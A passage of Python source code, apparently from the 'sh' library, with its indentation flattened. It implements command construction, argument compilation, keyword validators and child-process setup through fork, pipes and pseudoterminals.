elif isinstance(ob, (int, long)) and ob >= 0:
fileno = ob
return fileno
def ob_is_fd_based(ob):
return get_fileno(ob) is not None
def ob_is_tty(ob):
""" checks if an object (like a file-like object) is a tty. """
fileno = get_fileno(ob)
is_tty = False
if fileno is not None:
is_tty = os.isatty(fileno)
return is_tty
def ob_is_pipe(ob):
fileno = get_fileno(ob)
is_pipe = False
if fileno:
fd_stat = os.fstat(fileno)
is_pipe = stat.S_ISFIFO(fd_stat.st_mode)
return is_pipe
def tty_in_validator(passed_kwargs, merged_kwargs):
# here we'll validate that people aren't randomly shotgun-debugging different tty options and hoping that they'll
# work, without understanding what they do
pairs = (("tty_in", "in"), ("tty_out", "out"))
invalid = []
for tty_type, std in pairs:
if tty_type in passed_kwargs and ob_is_tty(passed_kwargs.get(std, None)):
error = "`_%s` is a TTY already, so so it doesn't make sense to set up a TTY with `_%s`" % (std, tty_type)
invalid.append(((tty_type, std), error))
# if unify_ttys is set, then both tty_in and tty_out must both be True
if merged_kwargs["unify_ttys"] and not (merged_kwargs["tty_in"] and merged_kwargs["tty_out"]):
invalid.append((
("unify_ttys", "tty_in", "tty_out"),
"`_tty_in` and `_tty_out` must both be True if `_unify_ttys` is True"
))
return invalid
def fg_validator(passed_kwargs, merged_kwargs):
""" fg is not valid with basically every other option """
invalid = []
msg = """\
_fg is invalid with nearly every other option, see warning and workaround here:
https://amoffat.github.io/sh/sections/special_arguments.html#fg"""
whitelist = set(("env", "fg", "cwd"))
offending = set(passed_kwargs.keys()) - whitelist
if "fg" in passed_kwargs and passed_kwargs["fg"] and offending:
invalid.append(("fg", msg))
return invalid
def bufsize_validator(passed_kwargs, merged_kwargs):
""" a validator to prevent a user from saying that they want custom
buffering when they're using an in/out object that will be os.dup'ed to the
process, and has its own buffering. an example is a pipe or a tty. it
doesn't make sense to tell them to have a custom buffering, since the os
controls this. """
invalid = []
in_ob = passed_kwargs.get("in", None)
out_ob = passed_kwargs.get("out", None)
in_buf = passed_kwargs.get("in_bufsize", None)
out_buf = passed_kwargs.get("out_bufsize", None)
in_no_buf = ob_is_fd_based(in_ob)
out_no_buf = ob_is_fd_based(out_ob)
err = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY"
if in_no_buf and in_buf is not None:
invalid.append((("in", "in_bufsize"), err.format(target="in")))
if out_no_buf and out_buf is not None:
invalid.append((("out", "out_bufsize"), err.format(target="out")))
return invalid
def env_validator(passed_kwargs, merged_kwargs):
""" a validator to check that env is a dictionary and that all environment variable
keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """
invalid = []
env = passed_kwargs.get("env", None)
if env is None:
return invalid
if not isinstance(env, Mapping):
invalid.append(("env", "env must be dict-like. Got {!r}".format(env)))
return invalid
for k, v in passed_kwargs["env"].items():
if not isinstance(k, str):
invalid.append(("env", "env key {!r} must be a str".format(k)))
if not isinstance(v, str):
invalid.append(("env", "value {!r} of env key {!r} must be a str".format(v, k)))
return invalid
class Command(object):
""" represents an un-run system program, like "ls" or "cd". because it
represents the program itself (and not a running instance of it), it should
hold very little state. in fact, the only state it does hold is baked
arguments.
when a Command object is called, the result that is returned is a
RunningCommand object, which represents the Command put into an execution
state. """
thread_local = threading.local()
_call_args = {
"fg": False, # run command in foreground
# run a command in the background. commands run in the background
# ignore SIGHUP and do not automatically exit when the parent process
# ends
"bg": False,
# automatically report exceptions for background commands
"bg_exc": True,
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024 ** 2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
# the amount of time to sleep between polling for the iter output queue
"iter_poll_time": 0.1,
"ok_code": 0,
"cwd": None,
# the separator delimiting between a long-argument's name and its value
# setting this to None will cause name and value to be two separate
# arguments, like for short options
# for example, --arg=derp, '=' is the long_sep
"long_sep": "=",
# the prefix used for long arguments
"long_prefix": "--",
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"unify_ttys": False,
"encoding": DEFAULT_ENCODING,
"decode_errors": "strict",
# how long the process should run before it is auto-killed
"timeout": None,
"timeout_signal": signal.SIGKILL,
# TODO write some docs on "long-running processes"
# these control whether or not stdout/err will get aggregated together
# as the process runs. this has memory usage implications, so sometimes
# with long-running processes with a lot of data, it makes sense to
# set these to true
"no_out": False,
"no_err": False,
"no_pipe": False,
# if any redirection is used for stdout or stderr, internal buffering
# of that data is not stored. this forces it to be stored, as if
# the output is being T'd to both the redirected destination and our
# internal buffers
"tee": None,
# will be called when a process terminates regardless of exception
"done": None,
# a tuple (rows, columns) of the desired size of both the stdout and
# stdin ttys, if ttys are being used
"tty_size": (20, 80),
# whether or not our exceptions should be truncated
"truncate_exc": True,
# a function to call after the child forks but before the process execs
"preexec_fn": None,
# UID to set after forking. Requires root privileges. Not supported on
# Windows.
"uid": None,
# put the forked process in its own process session?
"new_session": True,
# pre-process args passed into __call__. only really useful when used
# in .bake()
"arg_preprocess": None,
# a callable that produces a log message from an argument tuple of the
# command and the args
"log_msg": None,
# whether or not to close all inherited fds. typically, this should be True, as inheriting fds can be a security
# vulnerability
"close_fds": True,
# a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True
"pass_fds": set(),
}
# this is a collection of validators to make sure the special kwargs make
# sense
_kwarg_validators = (
(("err", "err_to_out"), "Stderr is already being redirected"),
(("piped", "iter"), "You cannot iterate when this command is being piped"),
(("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"),
(("no_out", "iter"), "You cannot iterate over output if there is no output"),
(("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"),
tty_in_validator,
bufsize_validator,
env_validator,
fg_validator,
)
def __init__(self, path, search_paths=None):
found = which(path, search_paths)
self._path = encode_to_py3bytes_or_py2str("")
# is the command baked (aka, partially applied)?
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
# bugfix for functools.wraps. issue #121
self.__name__ = str(self)
if not found:
raise CommandNotFound(path)
# the reason why we set the values early in the constructor, and again
# here, is for people who have tools that inspect the stack on
# exception. if CommandNotFound is raised, we need self._path and the
# other attributes to be set correctly, so repr() works when they're
# inspecting the stack. issue #304
self._path = encode_to_py3bytes_or_py2str(found)
self.__name__ = str(self)
def __getattribute__(self, name):
# convenience
get_attr = partial(object.__getattribute__, self)
val = None
if name.startswith("_"):
val = get_attr(name)
elif name == "bake":
val = get_attr("bake")
# here we have a way of getting past shadowed subcommands. for example,
# if "git bake" was a thing, we wouldn't be able to do `git.bake()`
# because `.bake()` is already a method. so we allow `git.bake_()`
elif name.endswith("_"):
name = name[:-1]
if val is None:
val = get_attr("bake")(name)
return val
@staticmethod
def _extract_call_args(kwargs):
""" takes kwargs that were passed to a command's __call__ and extracts
out the special keyword arguments, we return a tuple of special keyword
args, and kwargs that will go to the exec'ed command """
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
merged_args = Command._call_args.copy()
merged_args.update(call_args)
invalid_kwargs = special_kwarg_validator(call_args, merged_args, Command._kwarg_validators)
if invalid_kwargs:
exc_msg = []
for kwarg, error_msg in invalid_kwargs:
exc_msg.append(" %r: %s" % (kwarg, error_msg))
exc_msg = "\n".join(exc_msg)
raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg)
return call_args, kwargs
# TODO needs documentation
def bake(self, *args, **kwargs):
fn = type(self)(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k, v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError:
continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
prefix = pruned_call_args.get("long_prefix", self._call_args["long_prefix"])
fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix))
return fn
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return self.__unicode__().encode(DEFAULT_ENCODING)
def __eq__(self, other):
return str(self) == str(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
return "<Command %r>" % str(self)
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
self will call this """
baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
if baked_args:
baked_args = " " + baked_args
return self._path.decode(DEFAULT_ENCODING) + baked_args
def __enter__(self):
self(_with=True)
def __exit__(self, exc_type, exc_val, exc_tb):
get_prepend_stack().pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
# this will hold our final command, including arguments, that will be
# exec'ed
cmd = []
# this will hold a complete mapping of all our special keyword arguments
# and their values
call_args = Command._call_args.copy()
# aggregate any 'with' contexts
for prepend in get_prepend_stack():
pcall_args = prepend.call_args.copy()
# don't pass the 'with' call arg
pcall_args.pop("with", None)
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# do we have an argument pre-processor? if so, run it. we need to do
# this early, so that args, kwargs are accurate
preprocessor = self._partial_call_args.get("arg_preprocess", None)
if preprocessor:
args, kwargs = preprocessor(args, kwargs)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
extracted_call_args, kwargs = self._extract_call_args(kwargs)
call_args.update(self._partial_call_args)
call_args.update(extracted_call_args)
# handle a None. this is added back only to not break the api in the
# 1.* version. TODO remove this in 2.0, as "ok_code", if specified,
# should always be a definitive value or list of values, and None is
# ambiguous
if call_args["ok_code"] is None:
call_args["ok_code"] = 0
if not getattr(call_args["ok_code"], "__iter__", None):
call_args["ok_code"] = [call_args["ok_code"]]
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
if first_arg.call_args["piped"]:
stdin = first_arg.process
else:
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = compile_args(args, kwargs, call_args["long_sep"], call_args["long_prefix"])
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# if we're running in foreground mode, we need to completely bypass
# launching a RunningCommand and OProc and just do a spawn
if call_args["fg"]:
cwd = call_args["cwd"] or os.getcwd()
with pushd(cwd):
if call_args["env"] is None:
exit_code = os.spawnv(os.P_WAIT, cmd[0], cmd)
else:
exit_code = os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"])
exc_class = get_exc_exit_code_would_raise(exit_code, call_args["ok_code"], call_args["piped"])
if exc_class:
if IS_PY3:
ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
else:
ran = " ".join(cmd)
exc = exc_class(ran, b"", b"", call_args["truncate_exc"])
raise exc
return None
# stdout redirection
stdout = call_args["out"]
if output_redirect_is_filename(stdout):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if output_redirect_is_filename(stderr):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
def compile_args(a, kwargs, sep, prefix):
""" takes args and kwargs, as they were passed into the command instance
being executed with __call__, and compose them into a flat list that
will eventually be fed into exec. example:
with this call:
sh.ls("-l", "/tmp", color="never")
this function receives
args = ['-l', '/tmp']
kwargs = {'color': 'never'}
and produces
['-l', '/tmp', '--color=never']
"""
processed_args = []
encode = encode_to_py3bytes_or_py2str
# aggregate positional args
for arg in a:
if isinstance(arg, (list, tuple)):
if isinstance(arg, GlobResults) and not arg:
arg = [arg.path]
for sub_arg in arg:
processed_args.append(encode(sub_arg))
elif isinstance(arg, dict):
processed_args += aggregate_keywords(arg, sep, prefix, raw=True)
# see https://github.com/amoffat/sh/issues/522
elif arg is None or arg is False:
pass
else:
processed_args.append(encode(arg))
# aggregate the keyword arguments
processed_args += aggregate_keywords(kwargs, sep, prefix)
return processed_args
def aggregate_keywords(keywords, sep, prefix, raw=False):
""" take our keyword arguments, and a separator, and compose the list of
flat long (and short) arguments. example
{'color': 'never', 't': True, 'something': True} with sep '='
becomes
['--color=never', '-t', '--something']
the `raw` argument indicates whether or not we should leave the argument
name alone, or whether we should replace "_" with "-". if we pass in a
dictionary, like this:
sh.command({"some_option": 12})
then `raw` gets set to True, because we want to leave the key as-is, to
produce:
['--some_option=12']
but if we just use a command's kwargs, `raw` is False, which means this:
sh.command(some_option=12)
becomes:
['--some-option=12']
essentially, using kwargs is a convenience, but it lacks the ability to
put a '-' in the name, so we do the replacement of '_' to '-' for you.
but when you really don't want that to happen, you should use a
dictionary instead with the exact names you want
"""
processed = []
encode = encode_to_py3bytes_or_py2str
for k, v in keywords.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
if v is not False:
processed.append(encode("-" + k))
if v is not True:
processed.append(encode(v))
# we're doing a long arg
else:
if not raw:
k = k.replace("_", "-")
if v is True:
processed.append(encode(prefix + k))
elif v is False:
pass
elif sep is None or sep == " ":
processed.append(encode(prefix + k))
processed.append(encode(v))
else:
arg = encode("%s%s%s%s" % (prefix, k, sep, v))
processed.append(arg)
return processed
def _start_daemon_thread(fn, name, exc_queue, *a):
def wrap(*rgs, **kwargs):
try:
fn(*rgs, **kwargs)
except Exception as e:
exc_queue.put(e)
raise
thread = threading.Thread(target=wrap, name=name, args=a)
thread.daemon = True
thread.start()
return thread
def setwinsize(fd, rows_cols):
""" set the terminal size of a tty file descriptor. borrowed logic
from pexpect.py """
rows, cols = rows_cols
winsize = getattr(termios, 'TIOCSWINSZ', -2146929561)
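# note (comment added for clarity): -2146929561 is 0x80087467 read as a
# signed 32-bit int, i.e. the BSD-style TIOCSWINSZ ioctl number, used as a
# fallback when termios does not define TIOCSWINSZ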
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, winsize, s)
def construct_streamreader_callback(process, handler):
""" here we're constructing a closure for our streamreader callback. this
is used in the case that we pass a callback into _out or _err, meaning we
want to our callback to handle each bit of output
we construct the closure based on how many arguments it takes. the reason
for this is to make it as easy as possible for people to use, without
limiting them. a new user will assume the callback takes 1 argument (the
data). as they get more advanced, they may want to terminate the process,
or pass some stdin back, and will realize that they can pass a callback of
more args """
# implied arg refers to the "self" that methods will pass in. we need to
# account for this implied arg when figuring out what function the user
# passed in based on number of args
implied_arg = 0
partial_args = 0
handler_to_inspect = handler
if isinstance(handler, partial):
partial_args = len(handler.args)
handler_to_inspect = handler.func
if inspect.ismethod(handler_to_inspect):
implied_arg = 1
num_args = get_num_args(handler_to_inspect)
else:
if inspect.isfunction(handler_to_inspect):
num_args = get_num_args(handler_to_inspect)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = get_num_args(handler_to_inspect.__call__)
net_args = num_args - implied_arg - partial_args
handler_args = ()
# just the chunk
if net_args == 1:
handler_args = ()
# chunk, stdin
if net_args == 2:
handler_args = (process.stdin,)
# chunk, stdin, process
elif net_args == 3:
        # notice we're only storing a weakref, to prevent cyclic references
        # (where the process holds a streamreader, and a streamreader holds a
        # handler-closure with a reference to the process)
handler_args = (process.stdin, weakref.ref(process))
def fn(chunk):
# this is pretty ugly, but we're evaluating the process at call-time,
# because it's a weakref
a = handler_args
if len(a) == 2:
a = (handler_args[0], handler_args[1]())
return handler(chunk, *a)
return fn
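# an illustrative sketch (hypothetical command and handler names): the three
# callback shapes the closure above supports for _out/_err
#
#   def cb1(chunk): ...                     # just the output data
#   def cb2(chunk, stdin): ...              # data + the process's stdin queue
#   def cb3(chunk, stdin, process): ...     # data + stdin + the process itself
#
#   sh.tail("-f", "some.log", _out=cb3)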
def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok):
exc = None
success = exit_code in ok_codes
bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION
# if this is a piped command, SIGPIPE must be ignored by us and not raise an
# exception, since it's perfectly normal for the consumer of a process's
# pipe to terminate early
if sigpipe_ok and -exit_code == signal.SIGPIPE:
bad_sig = False
success = True
if not success or bad_sig:
exc = get_rc_exc(exit_code)
return exc
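# an illustrative sketch of the SIGPIPE carve-out above (assuming ok_codes of
# {0} and that SIGPIPE is among the signals that normally throw):
#
#   get_exc_exit_code_would_raise(-signal.SIGPIPE, {0}, True)   # -> None
#   get_exc_exit_code_would_raise(1, {0}, True)                 # -> ErrorReturnCode_1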
def handle_process_exit_code(exit_code):
""" this should only ever be called once for each child process """
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code):
exit_code = -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code):
exit_code = os.WEXITSTATUS(exit_code)
else:
raise RuntimeError("Unknown child exit status!")
return exit_code
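# illustrative examples of the decoding above: a child killed by SIGKILL has
# os.WIFSIGNALED(status) true and os.WTERMSIG(status) == 9, so this returns
# -9, while a clean exit(3) satisfies os.WIFEXITED and comes back as 3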
def no_interrupt(syscall, *args, **kwargs):
""" a helper for making system calls immune to EINTR """
ret = None
while True:
try:
ret = syscall(*args, **kwargs)
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
return ret
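# illustrative usage sketch: wrap any raw syscall that can fail with EINTR
# when a signal arrives mid-call, e.g.
#
#   data = no_interrupt(os.read, fd, 1024)   # retried on EINTR, re-raised otherwise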
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
    input/output to the child process. it gets its name from subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, command, parent_log, cmd, stdin, stdout, stderr, call_args, pipe, process_assign_lock):
"""
cmd is the full list of arguments that will be exec'd. it includes the program name and all its arguments.
stdin, stdout, stderr are what the child will use for standard input/output/err.
call_args is a mapping of all the special keyword arguments to apply to the child process.
"""
self.command = command
self.call_args = call_args
# convenience
ca = self.call_args
if ca["uid"] is not None:
if os.getuid() != 0:
raise RuntimeError("UID setting requires root privileges")
target_uid = ca["uid"]
pwrec = pwd.getpwuid(ca["uid"])
target_gid = pwrec.pw_gid
else:
target_uid, target_gid = None, None
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if ca["piped"]:
ca["tty_out"] = False
self._stdin_process = None
# if the objects that we are passing to the OProc happen to be a
# file-like object that is a tty, for example `sys.stdin`, then, later
# on in this constructor, we're going to skip out on setting up pipes
# and pseudoterminals for those endpoints
stdin_is_fd_based = ob_is_fd_based(stdin)
stdout_is_fd_based = ob_is_fd_based(stdout)
stderr_is_fd_based = ob_is_fd_based(stderr)
tee_out = ca["tee"] in (True, "out")
tee_err = ca["tee"] == "err"
single_tty = ca["tty_in"] and ca["tty_out"] and ca["unify_ttys"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
        # output correctly (that is, if stdout and stdin are both the same TTY)
if single_tty:
# master_fd, slave_fd = pty.openpty()
#
# Anything that is written on the master end is provided to the process on the slave end as though it was
# input typed on a terminal. -"man 7 pty"
#
# later, in the child process, we're going to do this, so keep it in mind:
#
# os.dup2(self._stdin_child_fd, 0)
# os.dup2(self._stdout_child_fd, 1)
# os.dup2(self._stderr_child_fd, 2)
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# this makes our parent fds behave like a terminal. it says that the very same fd that we "type" to (for
# stdin) is the same one that we see output printed to (for stdout)
self._stdout_parent_fd = os.dup(self._stdin_parent_fd)
# this line is what makes stdout and stdin attached to the same pty. in other words the process will write
# to the same underlying fd as stdout as it uses to read from for stdin. this makes programs like ssh happy
self._stdout_child_fd = os.dup(self._stdin_child_fd)
self._stderr_parent_fd = os.dup(self._stdin_parent_fd)
self._stderr_child_fd = os.dup(self._stdin_child_fd)
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing piping and so our stdin
# might be an instance of OProc
if isinstance(stdin, OProc) and stdin.call_args["piped"]:
self._stdin_child_fd = stdin._pipe_fd
self._stdin_parent_fd = None
self._stdin_process = stdin
elif stdin_is_fd_based:
self._stdin_child_fd = os.dup(get_fileno(stdin))
self._stdin_parent_fd = None
elif ca["tty_in"]:
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# tty_in=False is the default
else:
self._stdin_child_fd, self._stdin_parent_fd = os.pipe()
if stdout_is_fd_based and not tee_out:
self._stdout_child_fd = os.dup(get_fileno(stdout))
self._stdout_parent_fd = None
# tty_out=True is the default
elif ca["tty_out"]:
self._stdout_parent_fd, self._stdout_child_fd = pty.openpty()
else:
self._stdout_parent_fd, self._stdout_child_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is OProc.STDOUT:
# if stderr is going to stdout, but stdout is a tty or a pipe,
# we should not specify a read_fd, because stdout is os.dup'ed
# directly to the stdout fd (no pipe), and so stderr won't have
# a slave end of a pipe either to dup
if stdout_is_fd_based and not tee_out:
self._stderr_parent_fd = None
else:
self._stderr_parent_fd = os.dup(self._stdout_parent_fd)
self._stderr_child_fd = os.dup(self._stdout_child_fd)
elif stderr_is_fd_based and not tee_err:
self._stderr_child_fd = os.dup(get_fileno(stderr))
self._stderr_parent_fd = None
else:
self._stderr_parent_fd, self._stderr_child_fd = os.pipe()
piped = ca["piped"]
self._pipe_fd = None
if piped:
fd_to_use = self._stdout_parent_fd
if piped == "err":
fd_to_use = self._stderr_parent_fd
self._pipe_fd = os.dup(fd_to_use)
new_session = ca["new_session"]
needs_ctty = ca["tty_in"] and new_session
self.ctty = None
if needs_ctty:
self.ctty = os.ttyname(self._stdin_child_fd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
# for synchronizing
session_pipe_read, session_pipe_write = os.pipe()
exc_pipe_read, exc_pipe_write = os.pipe()
# this pipe is for synchronizing with the child that the parent has
# closed its in/out/err fds. this is a bug on OSX (but not linux),
# where we can lose output sometimes, due to a race, if we do
# os.close(self._stdout_child_fd) in the parent after the child starts
# writing.
if IS_MACOS:
close_pipe_read, close_pipe_write = os.pipe()
else:
close_pipe_read, close_pipe_write = None, None
# session id, group id, process id
self.sid = None
self.pgid = None
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
if IS_MACOS:
os.read(close_pipe_read, 1)
os.close(close_pipe_read)
os.close(close_pipe_write)
# this is critical
# our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky:
# if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so
# that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read)
# in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it
# hangs forever. not good! but obviously the child can't close the writing end until it knows it's not
            # going to have an exception, which is impossible to know, because what if os.execv itself raises? so
# the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the
# parent reading the read end won't block (close breaks the block).
flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags)
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if ca["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# python ignores SIGPIPE by default. we must make sure to put
# this behavior back to the default for spawned processes,
# otherwise SIGPIPE won't kill piped processes, which is what we
# need, so that we can check the error code of the killed
# process to see that SIGPIPE killed it
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# put our forked process in a new session? this will relinquish
# any control of our inherited CTTY and also make our parent
# process init
if new_session:
os.setsid()
# if we're not going in a new session, we should go in a new
# process group. this way, our process, and any children it
# spawns, are alone, contained entirely in one group. if we
# didn't do this, and didn't use a new session, then our exec'd
# process *could* exist in the same group as our python process,
# depending on how we launch the process (from a shell, or some
# other way)
else:
os.setpgrp()
sid = os.getsid(0)
pgid = os.getpgid(0)
payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING)
os.write(session_pipe_write, payload)
if ca["tty_out"] and not stdout_is_fd_based and not single_tty:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._stdout_child_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piping
if self._stdin_parent_fd:
os.close(self._stdin_parent_fd)
if self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
if self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
os.close(session_pipe_read)
os.close(exc_pipe_read)
cwd = ca["cwd"]
if cwd:
os.chdir(cwd)
os.dup2(self._stdin_child_fd, 0)
os.dup2(self._stdout_child_fd, 1)
os.dup2(self._stderr_child_fd, 2)
# set our controlling terminal, but only if we're using a tty
# for stdin. it doesn't make sense to have a ctty otherwise
if needs_ctty:
tmp_fd = os.open(os.ttyname(0), os.O_RDWR)
os.close(tmp_fd)
if ca["tty_out"] and not stdout_is_fd_based:
setwinsize(1, ca["tty_size"])
if ca["uid"] is not None:
os.setgid(target_gid)
os.setuid(target_uid)
preexec_fn = ca["preexec_fn"]
if callable(preexec_fn):
preexec_fn()
close_fds = ca["close_fds"]
if ca["pass_fds"]:
close_fds = True
if close_fds:
pass_fds = set((0, 1, 2, exc_pipe_write))
pass_fds.update(ca["pass_fds"])
# don't inherit file descriptors
inherited_fds = os.listdir("/dev/fd")
inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds
for fd in inherited_fds:
try:
os.close(fd)
except OSError:
pass
# actually execute the process
if ca["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, ca["env"])
# we must ensure that we carefully exit the child process on
# exception, otherwise the parent process code will be executed
# twice on exception https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
except: # noqa: E722
# some helpful debugging
tb = traceback.format_exc().encode("utf8", "ignore")
try:
os.write(exc_pipe_write, tb)
except Exception as e:
# dump to stderr if we cannot save it to exc_pipe_write
sys.stderr.write("\nFATAL SH ERROR: %s\n" % e)
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
os.close(self._stdin_child_fd)
os.close(self._stdout_child_fd)
os.close(self._stderr_child_fd)
# tell our child process that we've closed our write_fds, so it is
# ok to proceed towards exec. see the comment where this pipe is
# opened, for why this is necessary
if IS_MACOS:
os.close(close_pipe_read)
os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING))
os.close(close_pipe_write)
os.close(exc_pipe_write)
fork_exc = os.read(exc_pipe_read, 1024 ** 2)
os.close(exc_pipe_read)
if fork_exc:
fork_exc = fork_exc.decode(DEFAULT_ENCODING)
raise ForkException(fork_exc)
os.close(session_pipe_write)
sid, pgid = os.read(session_pipe_read, 1024).decode(DEFAULT_ENCODING).split(",")
os.close(session_pipe_read)
self.sid = int(sid)
self.pgid = int(pgid)
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin
# this accounts for when _out is a callable that is passed stdin. in that case, if stdin is unspecified, we
# must set it to a queue, so callbacks can put things on it
if callable(ca["out"]) and self.stdin is None:
self.stdin = Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
        # for the process's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=ca["internal_bufsize"])
self._stderr = deque(maxlen=ca["internal_bufsize"])
if ca["tty_in"] and not stdin_is_fd_based:
setwinsize(self._stdin_parent_fd, ca["tty_size"])
self.log = parent_log.get_child("process", repr(self))
self.log.debug("started process")
# disable echoing, but only if it's a tty that we created ourselves
if ca["tty_in"] and not stdin_is_fd_based:
attr = termios.tcgetattr(self._stdin_parent_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_parent_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if self._stdin_parent_fd:
log = self.log.get_child("streamwriter", "stdin")
self._stdin_stream = StreamWriter(log, self._stdin_parent_fd, self.stdin,
ca["in_bufsize"], ca["encoding"], ca["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not ca["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
